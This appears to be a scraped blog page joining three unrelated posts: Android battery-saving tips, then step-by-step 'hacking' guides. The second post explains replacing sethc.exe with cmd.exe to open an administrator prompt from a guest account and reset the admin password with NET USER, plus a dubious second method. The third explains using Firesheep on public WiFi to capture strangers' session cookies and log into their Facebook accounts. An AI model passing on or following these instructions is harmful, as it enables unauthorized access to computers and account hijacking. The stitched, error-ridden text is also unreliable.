In these days everyoneof us using SMART Phone. We are using Smart phones becausethey are providing lotsof applications. Android is one of the latest operating system in mobile withlots of free and paid applications. But during the use of these applications the battery of every smart phone gets down verysoon. So in this post ofmobile trick I am going to gives you some tricks with the help of these mobile tricks you can increaseyour battery life. 5 Tips to Protect YourSmartphone’s Battery 1.Go Easy on Ad-Supported Apps Most of the applications constantly connect andreload, which is a major hit to your battery life. Not all free apps have ads; and not all paid apps are ad free. But you can count on any ad-supported app to be a major drain on your battery, especially if it’s using location-tracking to personalize the content. 2.Beware of Apps that Use Too Many Internal Features Ads are a particular example, but any app that uses a lot of the ‘internals’ of your phone will suck the juice right out of it. As we’ve said, GPS and other location servicesare a major concern, but it also goes for vibration alerts, WiFi, Bluetooth, and sensors(accelerometer, compass, etc.) 3.Don’t Allow Push Alerts Email is great, Facebook is great, knowing the minute that there’s an update to your apps is great. Et cetera. After all, staying connected on a second-by-second basis is the reason younever let your smartphone out of your sight. Having saidthat, your battery might be drained twice as fast if you leave email push, social media, and/or app update notifications turned on. 4.Be Vigilant about Apps Mess with Your Display Apps and app settings that adjust the brightness and timeout of the screen could be costing you juice. Obviously one ofthose bright flashlight apps is going to run your battery down, but also keep an eye on things like graphics-intensive games, e-readers, lock screen gadgets. 5.Monitor your Usage I’ve been telling you all about apps that youshould watch out for, but I’ll change course and recommend two essential types of appsthat you should have installed: one to monitor your battery: ideally, with enough detail to let you know exactly what kinds of usage is most draining. And one to kill battery-sucking apps that keep running in the background. There area few apps that do both quite well; Android users should take a look at Android Assistant(which, ironically, comes in an ad-sponsored trial version). Beware of these factors and save your battery life for long period.

How to Hack admin pc using Guest

u can use the one which is easier for u... METHOD 1.. 1) Go to Cwindows/ &shy;system32. 2) Copy cmd.exe and paste it on desktop. 3) Rename cmd.exe to sethc.exe. 4) Copy the new sethc.exe tosystem 32,when windows asks for overwriting the file,then click yes. 5) Now Log out from your guest account and at the user select window,press shift key 5 times. 6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open. 7) Now type “ NET USER ADMINISTRATOR zzz where zzz can be any password you like and press enter. You will see “ The Command completed successfully and then exit the command prompt and login into administrator with your new password. 9) Bravo !! Now You have hacked admin through guest account. METHOD 2.. 1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu. 2. Select the option “Manage”. 3. On the left pane expand the “Computer Management (Local) tree (if it is not already expanded) 4. Double click “Local Users and Groups” option From “System Tools” tree. 5. Click the “Users” option. 6. Now you will see the list ofusers on the right side pane,such as Administrator, Guest etc. 7. Right click the “Administrator” and select the option “Set Password” option. 8. Now you will see a warningmessage, Click on proceed. 9. Now the system asks you for “New Password” and “Confirm Password” . 10. After entering the password click on “OK”. The password is changed. That’s It!.. that's it..!!! you have successfully changed the Administrator password without knowing It

Hacking any Facebook Account using Wifi

You need this requirement: *.Public Wi-Fi Access *. winpcap *. FireSheep
Step 1: Download the Firesheep file. Right click on the file and select "Open With" and select Mozila Firefox.
Step 2: Once you have installed firesheepin the Firefox web browser, click View at the top, then go to the sidebar and click on Fireheep.
Step 3 Now click on the top left "Start Capture" and start to capture the session cookies of people in yourWiFi network, which will show the list of cookies that are captured and have visited unsecured website known to firesheep, double-click the image and you will be logged in instantly.